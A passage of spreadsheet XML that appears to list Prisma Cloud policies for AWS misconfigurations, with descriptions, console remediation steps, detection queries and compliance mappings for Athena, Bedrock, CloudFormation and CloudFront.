        </is>
      </c>
      <c r="M1582" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1582" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1582" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1582" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1582" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1582" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1582" t="inlineStr"/>
      <c r="T1582" t="b">
        <v>0</v>
      </c>
      <c r="U1582" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1582" t="inlineStr">
        <is>
          <t>aws-athena-workgroup</t>
        </is>
      </c>
      <c r="W1582" t="inlineStr">
        <is>
          <t>This policy identifies AWS Athena workgroups not configured with data encryption at rest.
AWS Athena workgroup enables you to isolate queries for you or your group of users from other queries in the same account, to set the query results location and the encryption configuration. By default, Athena workgroup query run results are not encrypted at rest and client side settings can override the workgroup settings. Encrypting workgroups and preventing overrides from the client side helps in protecting the integrity and confidentiality of the data stored on Athena.
It is recommended to set encryption at rest and enable 'override client-side settings' to mitigate the risk of unauthorized access and potential data breaches.</t>
        </is>
      </c>
      <c r="X1582" t="inlineStr">
        <is>
          <t>To enable encryption at rest for the Athena workgroup, follow the below steps:
1. Sign in to the AWS Management Console and open the Amazon Athena console.
2. Under the navigation bar, click on Workgroups.
3. Select the alerted workgroup. Click on 'Edit'.
4. For Athena-based engines, under 'Query result configuration', enable 'Encrypt query results'.
5. Select 'Encryption type' based on the requirements. Make sure to set 'Minimum encryption'.
6. Under 'Settings', enable 'Override client-side settings'.
7. For Apache Spark-based engines, under 'Calculation result settings', enable 'Encrypt query results'.
8. Select 'Encryption type' based on the requirements.
9. Click on 'Save changes'.</t>
        </is>
      </c>
      <c r="Y1582" t="inlineStr"/>
      <c r="Z1582" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-athena-workgroup' AND json.rule = WorkGroup.State equal ignore case enabled and (WorkGroup.Configuration.ResultConfiguration.EncryptionConfiguration does not exist or (WorkGroup.Configuration.EngineVersion.EffectiveEngineVersion contains Athena and WorkGroup.Configuration.EnforceWorkGroupConfiguration is false))</t>
        </is>
      </c>
      <c r="AA1582" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1582" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1582" t="inlineStr">
        <is>
          <t>PC-AWS-ATN-1130</t>
        </is>
      </c>
      <c r="AD1582" t="b">
        <v>1</v>
      </c>
      <c r="AE1582" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1582" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>5405e934-1c52-450a-84d4-0b84c5eb2fa8</t>
        </is>
      </c>
      <c r="AI1582" t="inlineStr">
        <is>
          <t>62a0db03-89fd-4618-9ae5-895f1009ee7c</t>
        </is>
      </c>
      <c r="AJ1582" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1582" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" t="inlineStr"/>
      <c r="B1583" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1583" s="2" t="inlineStr"/>
      <c r="D1583" t="inlineStr"/>
      <c r="E1583" t="inlineStr"/>
      <c r="F1583" t="inlineStr"/>
      <c r="G1583" t="b">
        <v>1</v>
      </c>
      <c r="H15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83" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1583" t="inlineStr">
        <is>
          <t>aws-bedrock</t>
        </is>
      </c>
      <c r="K1583" t="inlineStr">
        <is>
          <t>AWS Bedrock agent is not associated with Bedrock guardrails</t>
        </is>
      </c>
      <c r="L1583" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1583" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1583" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1583" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1583" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1583" t="inlineStr"/>
      <c r="R1583" t="inlineStr"/>
      <c r="S1583" t="inlineStr"/>
      <c r="T1583" t="b">
        <v>0</v>
      </c>
      <c r="U1583" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1583" t="inlineStr">
        <is>
          <t>aws-bedrock-agent</t>
        </is>
      </c>
      <c r="W1583" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Bedrock agent that is not associated with Bedrock guardrails
Amazon Bedrock Guardrails provides governance and compliance controls for generative AI applications, ensuring safe and responsible model use. Associating Guardrails with the Bedrock agent is useful for implementing governance and compliance controls in generative AI applications. Not linking Guardrails to the Bedrock agent raises the risk of non-compliance and harmful AI application outputs.
It is recommended that AWS Bedrock agents be associated with Bedrock guardrails to implement safeguards and prevent unwanted behavior from model responses or user messages.</t>
        </is>
      </c>
      <c r="X1583" t="inlineStr">
        <is>
          <t>To associate the aws bedrock agent with the bedrock guardrail, perform the following actions:
1. Log in to the AWS console. and Navigate to Amazon Bedrock console available at https://console.aws.amazon.com/bedrock/.
2. In the navigation panel, under 'Builder tools', select 'Agents'.
3. In the Agents, Click on the agent that is reported.
4. Click on the 'Edit in Agent Builder' button on the right corner.
5. In the Agent builder window, Under the 'Guardrail details' section click 'Edit' and select the name and version of the Amazon Bedrock guardrail created previously or click on the link to Create a new guardtrail.
6. Choose 'Save and exit' to attach the selected guardrail to your Amazon Bedrock agent.</t>
        </is>
      </c>
      <c r="Y1583" t="inlineStr"/>
      <c r="Z1583" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-bedrock-agent' AND json.rule = agentStatus is not member of ( "DELETING","FAILED") and guardrailConfiguration.guardrailIdentifier does not exist</t>
        </is>
      </c>
      <c r="AA1583" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1583" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1583" t="inlineStr">
        <is>
          <t>PC-AWS-ABED-1312</t>
        </is>
      </c>
      <c r="AD1583" t="b">
        <v>1</v>
      </c>
      <c r="AE1583" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1583" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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83" t="inlineStr">
        <is>
          <t>a531ce58-18f2-439b-863f-601c3ac7f7c4</t>
        </is>
      </c>
      <c r="AI1583" t="inlineStr">
        <is>
          <t>4a122e5c-6bc6-4e4f-a757-fb9bcb3c9cc4</t>
        </is>
      </c>
      <c r="AJ1583" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1583" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1584" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1584" s="2" t="inlineStr"/>
      <c r="D1584" t="inlineStr"/>
      <c r="E1584" t="inlineStr"/>
      <c r="F1584" t="inlineStr"/>
      <c r="G1584" t="b">
        <v>1</v>
      </c>
      <c r="H15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584" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1584" t="inlineStr">
        <is>
          <t>aws-bedrock</t>
        </is>
      </c>
      <c r="K1584" t="inlineStr">
        <is>
          <t>AWS Bedrock Custom model encrypted with Customer Managed Key (CMK) is not enabled for regular rotation</t>
        </is>
      </c>
      <c r="L1584" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1584" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1584" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1584" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1584" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1584" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1584" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1584" t="inlineStr"/>
      <c r="T1584" t="b">
        <v>0</v>
      </c>
      <c r="U1584" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1584" t="inlineStr">
        <is>
          <t>aws-bedrock-custom-model</t>
        </is>
      </c>
      <c r="W1584" t="inlineStr">
        <is>
          <t>This policy identifies AWS Bedrock Custom model encrypted with Customer Managed Key (CMK) is not enabled for regular rotation.
AWS KMS (Key Management Service) allows customers to create master keys to encrypt the Custom model. Not enabling regular rotation for AWS Bedrock custom model key rotation failure can result in potential compliance violations.
As a security best practice, it is important to rotate the keys periodically so that if the keys are compromised, the data in the underlying service is still secure with the new keys.</t>
        </is>
      </c>
      <c r="X1584" t="inlineStr">
        <is>
          <t>The following steps are recommended to enable the automatic rotation of the KMS key used by the AWS Bedrock Custom model
1. Sign in to the AWS Management Console and open the Amazon Bedrock console at https://console.aws.amazon.com/bedrock/.
2. From the left navigation pane, choose 'Custom models' under 'Foundation models'.
3. In the 'Models' tab, select the model that is reported.
4. Under the 'Custom model encryption KMS key' section, click on the KMS key id link.
 5. Under the 'Key rotation' tab on the navigated KMS key window, click on Edit and enable the Key rotation option under the 'Automatic key rotation' section.
6. Provide the rotation period as per your business and compliance requirements in the 'Rotation period (in days)' section.
7. Click on Save.</t>
        </is>
      </c>
      <c r="Y1584" t="inlineStr"/>
      <c r="Z1584" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-bedrock-custom-model' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and keyMetadata.keyManager equal ignore case CUSTOMER and keyMetadata.origin equals AWS_KMS and (rotation_status.keyRotationEnabled is false or rotation_status.keyRotationEnabled equals "null") as Y; filter '$.X.modelKmsKeyArn equals $.Y.key.keyArn'; show X;</t>
        </is>
      </c>
      <c r="AA1584" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1584" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1584" t="inlineStr">
        <is>
          <t>PC-AWS-ABED-1288</t>
        </is>
      </c>
      <c r="AD1584" t="b">
        <v>1</v>
      </c>
      <c r="AE1584" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1584" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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84" t="inlineStr">
        <is>
          <t>34842045-a8a5-481b-9a36-a956c19555d7</t>
        </is>
      </c>
      <c r="AI1584" t="inlineStr">
        <is>
          <t>3a8f189c-dd9a-49e9-9bd2-1d49cffefec8</t>
        </is>
      </c>
      <c r="AJ1584" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1584" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 3, jneytchev-fedramp-low, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, Fedramp (Low), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), FFIEC, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Fedramp (Moderate), PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1585" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1585" s="2" t="inlineStr"/>
      <c r="D1585" t="inlineStr"/>
      <c r="E1585" t="inlineStr"/>
      <c r="F1585" t="inlineStr"/>
      <c r="G1585" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1585" t="inlineStr">
        <is>
          <t>aws-cloudformation</t>
        </is>
      </c>
      <c r="K1585" t="inlineStr">
        <is>
          <t>AWS CloudFormation template contains globally open resources</t>
        </is>
      </c>
      <c r="L1585" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1585" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1585" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1585" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1585" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1585" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1585" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1585" t="inlineStr"/>
      <c r="T1585" t="b">
        <v>0</v>
      </c>
      <c r="U1585" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1585" t="inlineStr">
        <is>
          <t>aws-cloudformation-describe-stacks</t>
        </is>
      </c>
      <c r="W1585" t="inlineStr">
        <is>
          <t>This alert triggers if a CloudFormation template that when launched will result in resources allowing global network access. Below are three common causes:
- Security Group with a {0.0.0.0/0, ::/0} rule
- Network Access Control List with a {0.0.0.0/0, ::/0} rule
- Network Access Control List with -1 IpProtocol</t>
        </is>
      </c>
      <c r="X1585" t="inlineStr">
        <is>
          <t>Prisma Cloud encourages you to review the template and ensure this is the intended behavior.
1. Goto the AWS CloudFormation dashboard.
2. Click on the Stack you want to modify.
3. Select the Template tab and then View in Designer.
4. Make your template modifications.
5. Check for syntax errors in your template by choosing Validate template near the top of the page.
6. Select Save from the file (icon) menu.
7. Choose Amazon S3 bucket, name your template and Save.
8. Copy the bucket URL and click OK.
9. Select Close to close Designer. 
10. Click on the Stack you want to modify.
11. From the Actions pull down menu, select Update stack
12. Choose Replace current template and paste the URL from Designer into the Amazon S3 URL field. Then click on Next.
13. Specify stack details, then click on Next.
14. Configure stack options, then click on Next.
15. Review, then select Update stack near the bottom of the page.</t>
        </is>
      </c>
      <c r="Y1585" t="inlineStr"/>
      <c r="Z1585" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudformation-describe-stacks' AND json.rule = "(($.stackResources[?( @.resourceType == 'AWS::EC2::SecurityGroup' || @.resourceType == 'AWS::EC2::SecurityGroupIngress' || @.resourceType == 'AWS::EC2::NetworkAclEntry')].resourceStatus any equal CREATE_COMPLETE) or ($.stackResources[?( @.resourceType == 'AWS::EC2::SecurityGroup' || @.resourceType == 'AWS::EC2::SecurityGroupIngress' || @.resourceType == 'AWS::EC2::NetworkAclEntry')].resourceStatus any equal UPDATE_COMPLETE)) and (($.cloudFormationTemplate.Resources.{}.SecurityGroupIngress[*].CidrIp any equal 0.0.0.0/0 or $.cloudFormationTemplate.Resources.{}.SecurityGroupIngress[*].CidrIpv6 any equal ::/0 or $.cloudFormationTemplate.Resources.{}.Properties.CidrIp any equal 0.0.0.0/0 or $.cloudFormationTemplate.Resources.{}.Properties.CidrIpv6 any equal ::/0) or ($.cloudFormationTemplate.Resources.{}.Properties.CidrBlock any equal 0.0.0.0/0 or $.cloudFormationTemplate.Resources.{}.Properties.Ipv6CidrBlock any equal ::/0 or $.cloudFormationTemplate.Resources.{}.Properties.Protocol any equal -1))"</t>
        </is>
      </c>
      <c r="AA1585" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1585" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1585" t="inlineStr">
        <is>
          <t>PC-AWS-CF-353</t>
        </is>
      </c>
      <c r="AD1585" t="b">
        <v>1</v>
      </c>
      <c r="AE1585" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1585" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>40351182-3b54-4f35-9e1e-423bbc5476ff</t>
        </is>
      </c>
      <c r="AI1585" t="inlineStr">
        <is>
          <t>f3e37827-223c-424b-ae35-3ac7dfde770b</t>
        </is>
      </c>
      <c r="AJ1585" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1585" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO 27002:2022, MLPS 2.0, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CIS Controls v8.1, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, NIST CSF, CIS Controls v7.1, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, jneytchev-fedramp-low, ISO/IEC 27002:2013, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, ISO/IEC 27001:2022, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Low), HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Fedramp (Moderate), ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1586" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1586" s="2" t="inlineStr"/>
      <c r="D1586" t="inlineStr"/>
      <c r="E1586" t="inlineStr"/>
      <c r="F1586" t="inlineStr"/>
      <c r="G1586" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1586" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K1586" t="inlineStr">
        <is>
          <t>AWS CloudFront web distribution with geo restriction disabled</t>
        </is>
      </c>
      <c r="L1586" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1586" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1586" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1586" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1586" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1586" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1586" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1586" t="inlineStr"/>
      <c r="T1586" t="b">
        <v>0</v>
      </c>
      <c r="U1586" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1586" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W1586" t="inlineStr">
        <is>
          <t>This policy identifies CloudFront web distributions which have geo restriction feature disabled. Geo Restriction has the ability to block IP addresses based on Geo IP by allowlist or denylist a country in order to allow or restrict users in specific locations from accessing web application content.</t>
        </is>
      </c>
      <c r="X1586" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, in which the alert is generated
3. Navigate to CloudFront Distributions Dashboard
4. Click on the reported distribution
5. On 'Restrictions' tab, Click on the 'Edit' button
6. On 'Edit Geo-Restrictions' page, Set 'Enable Geo-Restriction' to 'Yes' and allowlist/denylist countries as per your requirement.
7. Click on 'Yes, Edit'</t>
        </is>
      </c>
      <c r="Y1586" t="inlineStr"/>
      <c r="Z1586" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = 'restrictions.geoRestriction.restrictionType contains none'</t>
        </is>
      </c>
      <c r="AA1586" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1586" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1586" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-350</t>
        </is>
      </c>
      <c r="AD1586" t="b">
        <v>1</v>
      </c>
      <c r="AE1586" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1586" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>a920a1a2-6856-4eb2-b2db-7aee4ce03f4c</t>
        </is>
      </c>
      <c r="AI1586" t="inlineStr">
        <is>
          <t>4b1f46ec-9874-49f8-b735-902b47b7c676</t>
        </is>
      </c>
      <c r="AJ1586" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1586" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1587" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1587" s="2" t="inlineStr"/>
      <c r="D1587" t="inlineStr"/>
      <c r="E1587" t="inlineStr"/>
      <c r="F1587" t="inlineStr"/>
      <c r="G1587" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1587" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K1587" t="inlineStr">
        <is>
          <t>AWS CloudFront distributions does not have a default root object configured</t>
        </is>
      </c>
      <c r="L1587" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1587" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1587" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1587" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1587" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1587" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R1587" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S1587" t="inlineStr"/>
      <c r="T1587" t="b">
        <v>0</v>
      </c>
      <c r="U1587" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1587" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W1587" t="inlineStr">
        <is>
          <t>This policy identifies list of CloudFront distributions which does not have default root object configured. If a CloudFront distribution does not have a default root object configured, requests for the root of your distribution pass to your origin server which might return a list of the private contents of your origin. To avoid exposing the contents of your distribution or returning an error it is recommended to specify a default root object.</t>
        </is>
      </c>
      <c r="X1587" t="inlineStr">
        <is>
          <t>To configure a default root object for your distribution  follow the steps mentioned in below URL:
https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/DefaultRootObject.html#DefaultRootObjectHowToDefine 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-305
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-305</t>
        </is>
      </c>
      <c r="Y1587" t="inlineStr"/>
      <c r="Z1587" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = defaultRootObject is empty
{"category":"General","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
